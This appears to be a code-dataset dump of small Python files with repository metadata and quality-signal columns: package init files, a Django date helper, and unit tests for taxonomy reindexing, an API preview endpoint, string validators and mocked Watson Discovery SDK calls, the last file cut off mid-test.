hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cc5569a8a9c9037e5b3728e213e2d0c80c4e873e | 25 | py | Python | src/lib/__init__.py | ueffel/keypirinha-allmygames | 3ef8f641cec9d2165fbafcc7224f65d3fab1089a | [
"MIT"
] | 9 | 2020-05-31T11:13:52.000Z | 2021-09-23T14:26:42.000Z | src/lib/__init__.py | ueffel/keypirinha-allmygames | 3ef8f641cec9d2165fbafcc7224f65d3fab1089a | [
"MIT"
] | 9 | 2020-05-31T11:55:10.000Z | 2022-01-22T11:22:55.000Z | src/lib/__init__.py | ueffel/keypirinha-allmygames | 3ef8f641cec9d2165fbafcc7224f65d3fab1089a | [
"MIT"
] | 1 | 2020-09-11T17:40:51.000Z | 2020-09-11T17:40:51.000Z | from .steam import Steam
| 12.5 | 24 | 0.8 | 4 | 25 | 5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cc5bac568ec9e9c7466e7d8d6cde2b57d9041b78 | 26 | py | Python | agent/sensor/__init__.py | intelligent-control-lab/Composable_Agent_Toolbox | 39d71cdc0475ae6901cb30b63d181737bea35889 | [
"MIT"
] | 4 | 2020-10-20T14:30:09.000Z | 2022-02-19T23:46:04.000Z | agent/sensor/__init__.py | intelligent-control-lab/Composable_Agent_Toolbox | 39d71cdc0475ae6901cb30b63d181737bea35889 | [
"MIT"
] | null | null | null | agent/sensor/__init__.py | intelligent-control-lab/Composable_Agent_Toolbox | 39d71cdc0475ae6901cb30b63d181737bea35889 | [
"MIT"
] | 1 | 2022-03-12T10:46:38.000Z | 2022-03-12T10:46:38.000Z | from .sensor import Sensor | 26 | 26 | 0.846154 | 4 | 26 | 5.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 26 | 1 | 26 | 26 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cc6a0557624c5878181ad647171486e965d7e4cb | 100 | py | Python | kipoi/external/related/__init__.py | bfclarke/kipoi | 992b41eee8e35b39ae61262d988db974d8583759 | [
"MIT"
] | 213 | 2018-03-13T17:25:32.000Z | 2022-03-07T15:29:29.000Z | kipoi/external/related/__init__.py | bfclarke/kipoi | 992b41eee8e35b39ae61262d988db974d8583759 | [
"MIT"
] | 317 | 2018-03-14T11:03:57.000Z | 2022-03-31T17:48:54.000Z | kipoi/external/related/__init__.py | bfclarke/kipoi | 992b41eee8e35b39ae61262d988db974d8583759 | [
"MIT"
] | 44 | 2018-03-13T17:44:34.000Z | 2022-01-10T08:14:49.000Z | from kipoi_utils.external.related import * # backward comp
from . import mixins
from . import fields | 33.333333 | 58 | 0.8 | 14 | 100 | 5.642857 | 0.714286 | 0.253165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.14 | 100 | 3 | 59 | 33.333333 | 0.918605 | 0.13 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cc7d399a69cc932e4997d3a9feb524f4913ade8e | 146 | py | Python | signups/utils.py | City-of-Helsinki/open-city-signups | 3c36d3c1cba6f6fc85deadc54fb49a4318f4b1d4 | [
"MIT"
] | null | null | null | signups/utils.py | City-of-Helsinki/open-city-signups | 3c36d3c1cba6f6fc85deadc54fb49a4318f4b1d4 | [
"MIT"
] | 10 | 2018-05-15T12:29:07.000Z | 2020-06-05T19:20:34.000Z | signups/utils.py | City-of-Helsinki/open-city-signups | 3c36d3c1cba6f6fc85deadc54fb49a4318f4b1d4 | [
"MIT"
] | 1 | 2018-05-15T10:47:45.000Z | 2018-05-15T10:47:45.000Z | from django.utils import formats, timezone
def localize_datetime(dt):
return formats.date_format(timezone.localtime(dt), 'DATETIME_FORMAT')
| 24.333333 | 73 | 0.794521 | 19 | 146 | 5.947368 | 0.736842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109589 | 146 | 5 | 74 | 29.2 | 0.869231 | 0 | 0 | 0 | 0 | 0 | 0.10274 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
cc92c6a7a3ff3af69dea9d701bc21b05c26eeb2a | 7,132 | py | Python | tests/utils/test_df_reindex.py | motleystate/moonstone | 37c38fabf361722f7002626ef13c68c443ace4ac | [
"MIT"
] | null | null | null | tests/utils/test_df_reindex.py | motleystate/moonstone | 37c38fabf361722f7002626ef13c68c443ace4ac | [
"MIT"
] | 84 | 2020-07-27T13:01:12.000Z | 2022-03-16T17:10:23.000Z | tests/utils/test_df_reindex.py | motleystate/moonstone | 37c38fabf361722f7002626ef13c68c443ace4ac | [
"MIT"
] | null | null | null | from unittest import TestCase
import pandas as pd
from moonstone.utils.df_reindex import GenesToTaxonomy
class TestGenesToTaxonomy(TestCase):
def test_reindex_with_taxonomy(self):
df = pd.DataFrame(
[
[23, 7],
[15, 4],
],
columns=['sample_1', 'sample_2'],
index=['gene_1', 'gene_2'] # index dtype='object'
)
df_taxo = pd.DataFrame(
[
[147802,
'k__Bacteria; p__Firmicutes; c__Bacilli; o__Lactobacillales; \
f__Lactobacillaceae; g__Lactobacillus; s__iners'],
[1352,
'k__Bacteria; p__Firmicutes; c__Bacilli; o__Lactobacillales; \
f__Enterococcaceae; g__Enterococcus; s__faecium']
],
columns=['tax_id', 'full_tax'],
index=['gene_1', 'gene_2'] # index dtype='object'
)
df_expected = pd.DataFrame.from_dict(
{
'sample_1':
{
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Lactobacillaceae', 'Lactobacillus', 'Lactobacillus_iners'): 23,
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Enterococcaceae', 'Enterococcus', 'Enterococcus_faecium'): 15
},
'sample_2':
{
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Lactobacillaceae', 'Lactobacillus', 'Lactobacillus_iners'): 7,
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Enterococcaceae', 'Enterococcus', 'Enterococcus_faecium'): 4}
}
)
df_expected.index.set_names(["kingdom", "phylum", "class", "order", "family", "genus", "species"], inplace=True)
reindexation_instance = GenesToTaxonomy(df, df_taxo)
reindexed_df = reindexation_instance.reindexed_df
pd.testing.assert_frame_equal(reindexed_df, df_expected)
def test_reindex_with_taxonomy_missing_infos(self):
# for now, if there aren't any taxonomic information, the gene is dropped
df = pd.DataFrame(
[
[23, 7],
[15, 4],
],
columns=['sample_1', 'sample_2'],
index=['gene_1', 'gene_2'] # index dtype='object'
)
df_taxo = pd.DataFrame(
[
[147802,
'k__Bacteria; p__Firmicutes; c__Bacilli; o__Lactobacillales; \
f__Lactobacillaceae; g__Lactobacillus; s__iners'],
[1352,
'k__Bacteria; p__Firmicutes; c__Bacilli; o__Lactobacillales; \
f__Enterococcaceae; g__Enterococcus; s__faecium']
],
columns=['tax_id', 'full_tax'],
index=['gene_1', 'gene_3'] # index dtype='object'
)
df_expected = pd.DataFrame.from_dict(
{
'sample_1':
{
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Lactobacillaceae', 'Lactobacillus', 'Lactobacillus_iners'): 23
},
'sample_2':
{
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Lactobacillaceae', 'Lactobacillus', 'Lactobacillus_iners'): 7
}
}
)
df_expected.index.set_names(["kingdom", "phylum", "class", "order", "family", "genus", "species"], inplace=True)
reindexation_instance = GenesToTaxonomy(df, df_taxo)
reindexed_df = reindexation_instance.reindexed_df
pd.testing.assert_frame_equal(reindexed_df, df_expected)
pd.testing.assert_index_equal(reindexation_instance.without_info_index, pd.Index(['gene_2'], dtype='object'))
def test_reindex_with_taxonomy_summing(self):
df = pd.DataFrame(
[
[23, 7],
[15, 4],
],
columns=['sample_1', 'sample_2'],
index=['gene_1', 'gene_2'] # index dtype='object'
)
df_taxo = pd.DataFrame(
[
[147802,
'k__Bacteria; p__Firmicutes; c__Bacilli; o__Lactobacillales; \
f__Lactobacillaceae; g__Lactobacillus; s__iners'],
[147802,
'k__Bacteria; p__Firmicutes; c__Bacilli; o__Lactobacillales; \
f__Lactobacillaceae; g__Lactobacillus; s__iners']
],
columns=['tax_id', 'full_tax'],
index=['gene_1', 'gene_2'] # index dtype='object'
)
df_expected = pd.DataFrame.from_dict(
{
'sample_1':
{
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Lactobacillaceae', 'Lactobacillus', 'Lactobacillus_iners'): 38
},
'sample_2':
{
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Lactobacillaceae', 'Lactobacillus', 'Lactobacillus_iners'): 11,
}
}
)
df_expected.index.set_names(["kingdom", "phylum", "class", "order", "family", "genus", "species"], inplace=True)
reindexation_instance = GenesToTaxonomy(df, df_taxo)
reindexed_df = reindexation_instance.reindexed_df
pd.testing.assert_frame_equal(reindexed_df, df_expected)
def test_reindex_with_taxonomy_counting(self):
df = pd.DataFrame(
[
[23, 7],
[15, 0],
],
columns=['sample_1', 'sample_2'],
index=['gene_1', 'gene_2'] # index dtype='object'
)
df_taxo = pd.DataFrame(
[
[147802,
'k__Bacteria; p__Firmicutes; c__Bacilli; o__Lactobacillales; \
f__Lactobacillaceae; g__Lactobacillus; s__iners'],
[147802,
'k__Bacteria; p__Firmicutes; c__Bacilli; o__Lactobacillales; \
f__Lactobacillaceae; g__Lactobacillus; s__iners']
],
columns=['tax_id', 'full_tax'],
index=['gene_1', 'gene_2'] # index dtype='object'
)
df_expected = pd.DataFrame.from_dict(
{
'sample_1':
{
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Lactobacillaceae', 'Lactobacillus', 'Lactobacillus_iners'): 2
},
'sample_2':
{
('Bacteria', 'Firmicutes', 'Bacilli', 'Lactobacillales',
'Lactobacillaceae', 'Lactobacillus', 'Lactobacillus_iners'): 1,
}
}
)
df_expected.index.set_names(["kingdom", "phylum", "class", "order", "family", "genus", "species"], inplace=True)
reindexation_instance = GenesToTaxonomy(df, df_taxo)
reindexed_df = reindexation_instance.reindex_with_taxonomy(method='count')
pd.testing.assert_frame_equal(reindexed_df, df_expected)
| 40.067416 | 120 | 0.531969 | 616 | 7,132 | 5.766234 | 0.159091 | 0.037162 | 0.070383 | 0.112613 | 0.905687 | 0.891047 | 0.891047 | 0.884854 | 0.83643 | 0.82348 | 0 | 0.024919 | 0.347308 | 7,132 | 177 | 121 | 40.293785 | 0.738131 | 0.033511 | 0 | 0.603659 | 0 | 0 | 0.194537 | 0 | 0 | 0 | 0 | 0 | 0.030488 | 1 | 0.02439 | false | 0 | 0.018293 | 0 | 0.04878 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ccba47fc57350431d1be8b2239757900d9dab334 | 2,015 | py | Python | tests/cases/resources/tests/preview.py | rysdyk/serrano | 926d874b19efdd18e359d32bca601058b655b288 | [
"BSD-2-Clause"
] | null | null | null | tests/cases/resources/tests/preview.py | rysdyk/serrano | 926d874b19efdd18e359d32bca601058b655b288 | [
"BSD-2-Clause"
] | null | null | null | tests/cases/resources/tests/preview.py | rysdyk/serrano | 926d874b19efdd18e359d32bca601058b655b288 | [
"BSD-2-Clause"
] | 1 | 2020-01-16T15:26:37.000Z | 2020-01-16T15:26:37.000Z | import json
from django.contrib.auth.models import User
from django.test import TestCase
class PreviewResourceTestCase(TestCase):
def test_get(self):
response = self.client.get('/api/data/preview/',
HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json')
self.assertEqual(json.loads(response.content), {
'_links': {
'self': {
'href': 'http://testserver/api/data/preview/?limit=20&page=1',
},
'base': {
'href': 'http://testserver/api/data/preview/',
}
},
'keys': [],
'count': 0,
'object_count': 0,
'object_name': 'employee',
'object_name_plural': 'employees',
'objects': [],
'page_num': 1,
'num_pages': 1,
'limit': 20,
})
def test_get_with_user(self):
self.user = User.objects.create_user(username='test', password='test')
self.client.login(username='test', password='test')
response = self.client.get('/api/data/preview/',
HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-Type'], 'application/json')
self.assertEqual(json.loads(response.content), {
'_links': {
'self': {
'href': 'http://testserver/api/data/preview/?limit=20&page=1',
},
'base': {
'href': 'http://testserver/api/data/preview/',
}
},
'keys': [],
'count': 0,
'object_count': 0,
'object_name': 'employee',
'object_name_plural': 'employees',
'objects': [],
'page_num': 1,
'num_pages': 1,
'limit': 20,
})
| 34.152542 | 82 | 0.496278 | 186 | 2,015 | 5.252688 | 0.290323 | 0.042989 | 0.085977 | 0.122825 | 0.755374 | 0.755374 | 0.755374 | 0.755374 | 0.755374 | 0.755374 | 0 | 0.018391 | 0.352357 | 2,015 | 58 | 83 | 34.741379 | 0.730268 | 0 | 0 | 0.740741 | 0 | 0 | 0.27196 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 1 | 0.037037 | false | 0.037037 | 0.055556 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ccd43ac780845a390394a262b73271626dc4cf9e | 4,319 | py | Python | toshi/test/test_validation.py | IceExchange/ice-services-lib | 67a304ed4be183ed4b521624fc48be67936d141e | [
"MIT"
] | null | null | null | toshi/test/test_validation.py | IceExchange/ice-services-lib | 67a304ed4be183ed4b521624fc48be67936d141e | [
"MIT"
] | null | null | null | toshi/test/test_validation.py | IceExchange/ice-services-lib | 67a304ed4be183ed4b521624fc48be67936d141e | [
"MIT"
] | null | null | null | import unittest
from toshi import utils
class TestValidation(unittest.TestCase):
def test_validate_address(self):
self.assertTrue(utils.validate_address("0x056db290f8ba3250ca64a45d16284d04bc6f5fbf"))
self.assertTrue(utils.validate_address(u"0x056db290f8ba3250ca64a45d16284d04bc6f5fbf"))
self.assertFalse(utils.validate_address("hello"))
self.assertFalse(utils.validate_address("0x12345"))
self.assertFalse(utils.validate_address(None))
self.assertFalse(utils.validate_address({}))
self.assertFalse(utils.validate_address(0x056db290f8ba3250ca64a45d16284d04bc6f5fbf))
self.assertFalse(utils.validate_address("0x114655db4898a6580f0abfc53fc0c0a88110724abf8d41f2abf206c69d7d4c821ed2cdf6939484ef6aebc39ce5662363b82140106bbc374a0f1381b6948214b001"))
def test_validate_signature(self):
self.assertTrue(utils.validate_signature("0x114655db4898a6580f0abfc53fc0c0a88110724abf8d41f2abf206c69d7d4c821ed2cdf6939484ef6aebc39ce5662363b82140106bbc374a0f1381b6948214b001"))
self.assertTrue(utils.validate_signature(u"0x114655db4898a6580f0abfc53fc0c0a88110724abf8d41f2abf206c69d7d4c821ed2cdf6939484ef6aebc39ce5662363b82140106bbc374a0f1381b6948214b001"))
self.assertFalse(utils.validate_signature("hello"))
self.assertFalse(utils.validate_signature("0x12345"))
self.assertFalse(utils.validate_signature(None))
self.assertFalse(utils.validate_signature({}))
self.assertFalse(utils.validate_signature(0x114655db4898a6580f0abfc53fc0c0a88110724abf8d41f2abf206c69d7d4c821ed2cdf6939484ef6aebc39ce5662363b82140106bbc374a0f1381b6948214b001))
self.assertFalse(utils.validate_signature("0x056db290f8ba3250ca64a45d16284d04bc6f5fbf"))
def test_validate_hex_string(self):
self.assertTrue(utils.validate_hex_string("0x1"))
self.assertTrue(utils.validate_hex_string(u"0x1"))
self.assertTrue(utils.validate_hex_string("0xA"))
self.assertTrue(utils.validate_hex_string("0xABCDEF"))
self.assertFalse(utils.validate_hex_string("0xHIJKL"))
self.assertFalse(utils.validate_hex_string(12345))
self.assertFalse(utils.validate_hex_string(0xABC))
self.assertFalse(utils.validate_hex_string(None))
self.assertFalse(utils.validate_hex_string({}))
self.assertFalse(utils.validate_hex_string("ABCDEF"))
self.assertFalse(utils.validate_hex_string("0x"))
def test_validate_int_string(self):
self.assertTrue(utils.validate_int_string("12345"))
self.assertTrue(utils.validate_int_string(u"12345"))
self.assertTrue(utils.validate_int_string("1"))
self.assertTrue(utils.validate_int_string("-1"))
self.assertTrue(utils.validate_int_string("2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001"))
self.assertFalse(utils.validate_int_string("1.2"))
self.assertFalse(utils.validate_int_string("0xABC"))
self.assertFalse(utils.validate_int_string(0xABC))
self.assertFalse(utils.validate_int_string(None))
self.assertFalse(utils.validate_int_string({}))
self.assertFalse(utils.validate_int_string("ABCDEF"))
self.assertFalse(utils.validate_int_string("01"))
def test_validate_decimal_string(self):
self.assertTrue(utils.validate_decimal_string("12345.0000"))
self.assertTrue(utils.validate_decimal_string(u"12345.0000"))
self.assertTrue(utils.validate_decimal_string("12345.12345"))
self.assertTrue(utils.validate_decimal_string("-1.2"))
self.assertTrue(utils.validate_decimal_string("1.0"))
self.assertTrue(utils.validate_decimal_string("2.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001"))
self.assertFalse(utils.validate_decimal_string("1"))
self.assertFalse(utils.validate_decimal_string("0xABC"))
self.assertFalse(utils.validate_decimal_string(0xABC))
self.assertFalse(utils.validate_decimal_string(None))
self.assertFalse(utils.validate_decimal_string({}))
self.assertFalse(utils.validate_decimal_string("ABCDEF"))
self.assertFalse(utils.validate_decimal_string("01.1"))
| 59.164384 | 186 | 0.782125 | 394 | 4,319 | 8.317259 | 0.104061 | 0.206286 | 0.201404 | 0.281965 | 0.805005 | 0.606958 | 0.217577 | 0.140983 | 0.111077 | 0.111077 | 0 | 0.205209 | 0.119935 | 4,319 | 72 | 187 | 59.986111 | 0.656932 | 0 | 0 | 0 | 0 | 0 | 0.212086 | 0.179903 | 0 | 0 | 0.174114 | 0 | 0.866667 | 1 | 0.083333 | false | 0 | 0.033333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ccd52b38ce025e9f08a5ee67412f7a4dd5fc8e4c | 43,194 | py | Python | test/unit/test_discovery_v1.py | SamArtGS/python-sdk | 7be6a4fe75d4a9fd365ef626d6289c0dc8457f3a | [
"Apache-2.0"
] | 1 | 2018-10-04T19:13:44.000Z | 2018-10-04T19:13:44.000Z | test/unit/test_discovery_v1.py | SamArtGS/python-sdk | 7be6a4fe75d4a9fd365ef626d6289c0dc8457f3a | [
"Apache-2.0"
] | null | null | null | test/unit/test_discovery_v1.py | SamArtGS/python-sdk | 7be6a4fe75d4a9fd365ef626d6289c0dc8457f3a | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
import responses
import os
import json
import io
import watson_developer_cloud
from watson_developer_cloud.discovery_v1 import TrainingDataSet, TrainingQuery, TrainingExample
try:
from urllib.parse import urlparse, urljoin
except ImportError:
from urlparse import urlparse, urljoin
base_discovery_url = 'https://gateway.watsonplatform.net/discovery/api/v1/'
platform_url = 'https://gateway.watsonplatform.net'
service_path = '/discovery/api'
base_url = '{0}{1}'.format(platform_url, service_path)
version = '2016-12-01'
environment_id = 'envid'
collection_id = 'collid'
@responses.activate
def test_environments():
discovery_url = urljoin(base_discovery_url, 'environments')
discovery_response_body = """{
"environments": [
{
"environment_id": "string",
"name": "envname",
"description": "",
"created": "2016-11-20T01:03:17.645Z",
"updated": "2016-11-20T01:03:17.645Z",
"status": "status",
"index_capacity": {
"disk_usage": {
"used_bytes": 0,
"total_bytes": 0,
"used": "string",
"total": "string",
"percent_used": 0
},
"memory_usage": {
"used_bytes": 0,
"total_bytes": 0,
"used": "string",
"total": "string",
"percent_used": 0
}
}
}
]
}"""
responses.add(responses.GET, discovery_url,
body=discovery_response_body, status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.list_environments()
url_str = "{0}?version=2016-11-07".format(discovery_url)
assert responses.calls[0].request.url == url_str
assert responses.calls[0].response.text == discovery_response_body
assert len(responses.calls) == 1
@responses.activate
def test_get_environment():
discovery_url = urljoin(base_discovery_url, 'environments/envid')
responses.add(responses.GET, discovery_url,
body="{\"resulting_key\": true}", status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.get_environment(environment_id='envid')
url_str = "{0}?version=2016-11-07".format(discovery_url)
assert responses.calls[0].request.url == url_str
assert len(responses.calls) == 1
@responses.activate
def test_create_environment():
discovery_url = urljoin(base_discovery_url, 'environments')
responses.add(responses.POST, discovery_url,
body="{\"resulting_key\": true}", status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.create_environment(name="my name", description="my description")
assert len(responses.calls) == 1
@responses.activate
def test_update_environment():
discovery_url = urljoin(base_discovery_url, 'environments/envid')
responses.add(responses.PUT, discovery_url,
body="{\"resulting_key\": true}", status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.update_environment('envid', name="hello", description="new")
assert len(responses.calls) == 1
@responses.activate
def test_delete_environment():
discovery_url = urljoin(base_discovery_url, 'environments/envid')
responses.add(responses.DELETE, discovery_url,
body="{\"resulting_key\": true}", status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.delete_environment('envid')
assert len(responses.calls) == 1
@responses.activate
def test_collections():
discovery_url = urljoin(base_discovery_url,
'environments/envid/collections')
responses.add(responses.GET, discovery_url,
body="{\"body\": \"hello\"}", status=200,
content_type='application/json')
discovery = watson_developer_cloud.DiscoveryV1('2016-11-07',
username='username',
password='password')
discovery.list_collections('envid')
called_url = urlparse(responses.calls[0].request.url)
test_url = urlparse(discovery_url)
assert called_url.netloc == test_url.netloc
assert called_url.path == test_url.path
assert len(responses.calls) == 1
@responses.activate
def test_collection():
discovery_url = urljoin(base_discovery_url,
'environments/envid/collections/collid')
discovery_fields = urljoin(base_discovery_url,
'environments/envid/collections/collid/fields')
config_url = urljoin(base_discovery_url,
'environments/envid/configurations')
responses.add(responses.GET, config_url,
body="{\"body\": \"hello\"}",
status=200,
content_type='application/json')
responses.add(responses.GET, discovery_fields,
body="{\"body\": \"hello\"}", status=200,
content_type='application/json')
responses.add(responses.GET, discovery_url,
body="{\"body\": \"hello\"}", status=200,
content_type='application/json')
responses.add(responses.DELETE, discovery_url,
body="{\"body\": \"hello\"}", status=200,
content_type='application/json')
responses.add(responses.POST,
urljoin(base_discovery_url,
'environments/envid/collections'),
body="{\"body\": \"create\"}",
